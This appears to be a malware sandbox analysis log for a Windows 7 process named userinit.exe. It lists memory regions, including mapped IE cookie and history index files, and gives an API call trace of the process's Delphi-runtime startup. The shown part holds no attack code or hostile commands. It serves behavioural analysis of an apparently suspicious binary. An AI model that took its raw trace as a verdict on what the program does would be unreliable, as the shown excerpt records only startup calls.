name = "private_0x0000000000150000"
filename = ""
Region:
id = 5986
start_va = 0x6d820000
end_va = 0x6d838fff
entry_point = 0x6d820000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 5987
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 5988
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 5989
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 5990
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 5997
start_va = 0x2b60000
end_va = 0x2b9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b60000"
filename = ""
Region:
id = 5998
start_va = 0x2ba0000
end_va = 0x2c9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ba0000"
filename = ""
Region:
id = 5999
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 6000
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 6001
start_va = 0x2ca0000
end_va = 0x2f6efff
entry_point = 0x2ca0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 6002
start_va = 0x170000
end_va = 0x171fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 6003
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 6004
start_va = 0x180000
end_va = 0x180fff
entry_point = 0x180000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 6009
start_va = 0x190000
end_va = 0x191fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 6010
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 6011
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 6012
start_va = 0x180000
end_va = 0x180fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 6013
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 6014
start_va = 0x2a0000
end_va = 0x2cbfff
entry_point = 0x2a0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 6015
start_va = 0x1a0000
end_va = 0x1a7fff
entry_point = 0x1a0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 6016
start_va = 0x1b0000
end_va = 0x1bffff
entry_point = 0x1b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 6017
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 6018
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 6019
start_va = 0x2f70000
end_va = 0x317ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f70000"
filename = ""
Region:
id = 6020
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 6021
start_va = 0x2f70000
end_va = 0x311ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f70000"
filename = ""
Region:
id = 6022
start_va = 0x3140000
end_va = 0x317ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003140000"
filename = ""
Region:
id = 6023
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 6024
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 6027
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 6028
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 6029
start_va = 0xc20000
end_va = 0xcdffff
entry_point = 0xc20000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 295
os_tid = 0x5a8
[0187.804] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0187.804] GetKeyboardType (nTypeFlag=0) returned 4
[0187.804] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0187.804] GetStartupInfoA (in: lpStartupInfo=0x12fab4 | out: lpStartupInfo=0x12fab4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0187.804] GetVersion () returned 0x1db10106
[0187.804] GetVersion () returned 0x1db10106
[0187.804] GetCurrentThreadId () returned 0x5a8
[0187.804] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x12f5b0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0187.804] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f48b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0187.804] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12f5a0 | out: phkResult=0x12f5a0*=0x0) returned 0x2
[0187.805] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12f5a0 | out: phkResult=0x12f5a0*=0x0) returned 0x2
[0187.805] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12f5a0 | out: phkResult=0x12f5a0*=0x0) returned 0x2
[0187.805] lstrcpynA (in: lpString1=0x12f48b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0187.805] GetThreadLocale () returned 0x409
[0187.805] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x12f59b, cchData=5 | out: lpLCData="ENU") returned 4
[0187.805] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0187.805] lstrcpynA (in: lpString1=0x12f4a8, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0187.806] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0187.806] lstrcpynA (in: lpString1=0x12f4a8, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0187.806] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0187.806] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0187.806] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x2e3640
[0187.806] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x580000
[0187.806] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x2e4640
[0187.806] VirtualAlloc (lpAddress=0x580000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x580000
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x12f6d4, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x12f6c0, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0187.807] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12f6c0, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0187.807] GetVersionExA (in: lpVersionInformation=0x12fa58*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fa58*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0187.807] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0187.807] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0187.808] GetThreadLocale () returned 0x409
[0187.808] GetThreadLocale () returned 0x409
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x12f930, cchData=256 | out: lpLCData="Jan") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x12f930, cchData=256 | out: lpLCData="January") returned 8
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x12f930, cchData=256 | out: lpLCData="Feb") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x12f930, cchData=256 | out: lpLCData="February") returned 9
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x12f930, cchData=256 | out: lpLCData="Mar") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f930, cchData=256 | out: lpLCData="March") returned 6
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x12f930, cchData=256 | out: lpLCData="Apr") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f930, cchData=256 | out: lpLCData="April") returned 6
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x12f930, cchData=256 | out: lpLCData="May") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f930, cchData=256 | out: lpLCData="May") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x12f930, cchData=256 | out: lpLCData="Jun") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f930, cchData=256 | out: lpLCData="June") returned 5
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f930, cchData=256 | out: lpLCData="Jul") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f930, cchData=256 | out: lpLCData="July") returned 5
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f930, cchData=256 | out: lpLCData="Aug") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f930, cchData=256 | out: lpLCData="August") returned 7
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f930, cchData=256 | out: lpLCData="Sep") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x12f930, cchData=256 | out: lpLCData="September") returned 10
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f930, cchData=256 | out: lpLCData="Oct") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x12f930, cchData=256 | out: lpLCData="October") returned 8
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f930, cchData=256 | out: lpLCData="Nov") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x12f930, cchData=256 | out: lpLCData="November") returned 9
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f930, cchData=256 | out: lpLCData="Dec") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x12f930, cchData=256 | out: lpLCData="December") returned 9
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x12f930, cchData=256 | out: lpLCData="Sun") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x12f930, cchData=256 | out: lpLCData="Sunday") returned 7
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x12f930, cchData=256 | out: lpLCData="Mon") returned 4
[0187.808] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f930, cchData=256 | out: lpLCData="Monday") returned 7
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x12f930, cchData=256 | out: lpLCData="Tue") returned 4
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f930, cchData=256 | out: lpLCData="Tuesday") returned 8
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x12f930, cchData=256 | out: lpLCData="Wed") returned 4
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f930, cchData=256 | out: lpLCData="Wednesday") returned 10
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x12f930, cchData=256 | out: lpLCData="Thu") returned 4
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f930, cchData=256 | out: lpLCData="Thursday") returned 9
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x12f930, cchData=256 | out: lpLCData="Fri") returned 4
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f930, cchData=256 | out: lpLCData="Friday") returned 7
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x12f930, cchData=256 | out: lpLCData="Sat") returned 4
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f930, cchData=256 | out: lpLCData="Saturday") returned 9
[0187.809] GetThreadLocale () returned 0x409
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x12f98c, cchData=256 | out: lpLCData="$") returned 2
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f98c, cchData=256 | out: lpLCData="0") returned 2
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f98c, cchData=256 | out: lpLCData="0") returned 2
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa84, cchData=2 | out: lpLCData=",") returned 2
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa84, cchData=2 | out: lpLCData=".") returned 2
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x12f98c, cchData=256 | out: lpLCData="2") returned 2
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa84, cchData=2 | out: lpLCData="/") returned 2
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f98c, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0187.809] GetThreadLocale () returned 0x409
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f958, cchData=256 | out: lpLCData="1") returned 2
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x12f98c, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0187.809] GetThreadLocale () returned 0x409
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f958, cchData=256 | out: lpLCData="1") returned 2
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa84, cchData=2 | out: lpLCData=":") returned 2
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x12f98c, cchData=256 | out: lpLCData="AM") returned 3
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x12f98c, cchData=256 | out: lpLCData="PM") returned 3
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x12f98c, cchData=256 | out: lpLCData="0") returned 2
[0187.809] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x12f98c, cchData=256 | out: lpLCData="0") returned 2
[0187.810] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f98c, cchData=256 | out: lpLCData="0") returned 2
[0187.810] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa84, cchData=2 | out: lpLCData=",") returned 2
[0187.810] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0187.810] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0187.811] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0187.811] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0187.811] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0187.811] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0187.811] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0187.811] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0187.811] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0187.811] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0187.811] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0187.811] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0187.811] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0187.811] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0187.811] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0187.811] GetDC (hWnd=0x0) returned 0x68010872
[0187.811] GetDeviceCaps (hdc=0x68010872, index=90) returned 96
[0187.812] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0187.812] GetDC (hWnd=0x0) returned 0x68010872
[0187.812] GetDeviceCaps (hdc=0x68010872, index=104) returned 0
[0187.812] ReleaseDC (hWnd=0x0, hDC=0x68010872) returned 1
[0187.812] CreatePalette (plpal=0x12f6e8) returned 0xd8080834
[0187.812] GetStockObject (i=7) returned 0x1b00017
[0187.812] GetStockObject (i=5) returned 0x1900015
[0187.812] GetStockObject (i=13) returned 0x18a002e
[0187.812] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0187.812] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0187.812] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0187.812] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0187.812] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0187.812] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0187.812] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0187.812] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0187.812] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0187.812] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0187.812] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0187.812] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x12f6e4, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
